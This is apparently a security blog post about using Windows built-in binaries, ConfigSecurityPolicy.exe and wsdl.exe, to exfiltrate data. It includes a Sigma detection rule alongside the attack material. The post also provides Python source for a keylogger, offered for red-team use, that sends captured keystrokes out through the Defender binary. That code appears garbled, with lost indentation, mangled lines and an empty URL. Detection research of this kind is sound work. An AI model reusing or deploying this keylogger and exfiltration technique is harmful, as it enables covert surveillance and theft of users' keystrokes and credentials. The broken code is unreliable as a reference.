Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can check a lof of tricks on “” — Living Off The Land Binaries And Scripts — (LOLBins and LOLScripts).

My first discover was a simple way to abuse Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9–0\ConfigSecurityPolicy.exe”] to exfil data:


Looking for a little more, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility), The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which enables you to generate a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:


Blueteam/Redteam tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple sigma rule to help possible insider threat:
product: windows
category: process_creation
Image: '*\ConfigSecurityPolicy.exe'
- '*ConfigSecurityPolicy.exe*'
- '*.xml'
condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins

A piece of code to help readteam usage(thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From:
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = ''
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
content += str(key)
print(f'last key: {str(key)}')
if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')[uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''
if key == 0x03:
if __name__ == "__main__":
with Listener(on_press=on_press) as listener:
except (KeyboardInterrupt, SystemExit):
Proof of Concept

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, a simple and effective way to simulate possible tactics of your opponents, soon I will come back with more tips.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
movq %rax,%rax

movq %rax,%rax


reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\